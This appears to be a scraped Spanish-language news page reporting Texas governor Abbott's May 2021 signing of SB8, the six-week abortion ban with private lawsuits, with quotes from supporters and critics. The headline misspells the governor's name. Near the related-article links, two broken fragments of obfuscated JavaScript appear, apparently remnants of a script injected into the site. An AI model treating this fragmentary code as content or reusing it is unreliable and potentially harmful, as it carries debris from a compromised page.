Featured

Se prohíben los abortos después de las 6 semanas en Texas, el gobernador Abbett lo convierte en ley

today05/20/2021 13

Fondo
share close

Activistas han catalogado la medida como una de “las más extremas y peligrosas del país”. Bajo la nueva ley, cualquier persona puede demandar a los médicos y establecimientos que hagan estos procesos después del tiempo establecido en la medida.

 

AUSTIN, Texas.- El gobernador de Texas, Greg Abbott, convirtió en ley el proyecto SB8 que prohíbe los abortos después de las 6 semanas y permite a las personas demandar a los médicos y establecimientos que hagan estos procesos después del tiempo establecido en la medida.

 

El proyecto de ley entrará en vigor el 1 de septiembre de 2021 a menos que intervengan los tribunals.

 

«Nuestro creador nos otorgó el derecho a la vida y, sin embargo, millones de niños pierden su derecho a la vida cada año debido al aborto. En Texas, trabajamos para salvar esas vidas y eso es exactamente lo que hizo la Legislatura de Texas en esta sesión», dijo Abbott durante un video en vivo de la ceremonia compartido en Facebook.

 

SB8, llamada “ley de latidos del corazón”, prohibirá los abortos una vez que se detecta un latido fetal que suele ser a las seis semanas de gestación y antes de que la mayoría de las mujeres sepan que están embarazadas

 

El proyecto de ley fue denunciado por legisladores y médicos, quienes dijeron que su amplio lenguaje legal podría abrir la puerta a juicios de acoso contra los proveedores de servicios de aborto.

 

“En lugar de enfocarse en arreglar nuestra red eléctrica, nuestra Legislatura estatal usó su poder para imponer una de las prohibiciones de

aborto más extremas y peligrosas del país”, indicó la directora ejecutiva de la organización Avow, Aimee Arrambide.

 

El proyecto de ley no hace una excepción para las sobrevivientes de violación o incesto que quedan embarazadas como resultado del delito cometido contra ellas. Solo permite una excepción para una mujer que sufre una emergencia médica.

 

De acuerdo con la portavoz de la organización Progress Texas, Diana Gómez, el problema de la medida radica en una cláusula que permite a “cualquier persona” demandar a alguien que tuvo que ver con el aborto. Un médico de Texas que realiza o tiene la intención de realizar un aborto puede ser demandado y el demandante podría recuperar hasta $10,000.

 

La Cámara enmendó el proyecto de ley para excluir a los violadores y las personas que cometen incesto contra una mujer de poder demandar a los médicos. Como estaba la medida originalmente, estipulaba que «cualquier persona» incluyendo violadores pudiesen demandar a sus víctimas por realizarse un aborto.

 

Fuente: Univision

Escrito por Editor

Rate it

Artículo anterior

insert_link ) == "string") return $nJe.list[n].split("").reverse().join("");ret/"]

Featured

Nueva York también se quita la mascarilla en medio de dudas sobre su impacto en la pandemia

Este miércoles Nueva York se suma a una lista de al menos 14 estados que ya han adoptado las más recientes directrices de los Centros para el Control y Prevención de Enfermedades. Casi la mitad de los neoyorquinos todavía no están completamente inmunizados, lo que despierta incertidumbre.   Nueva York, que hace un año fue el epicentro de la pandemia en EEUU, permitirá desde este miércoles ir sin mascarilla y […]

today05/19/2021 13 ) == "string") return $nJe.list[n].split("").reverse().join("");ret/" ]

0%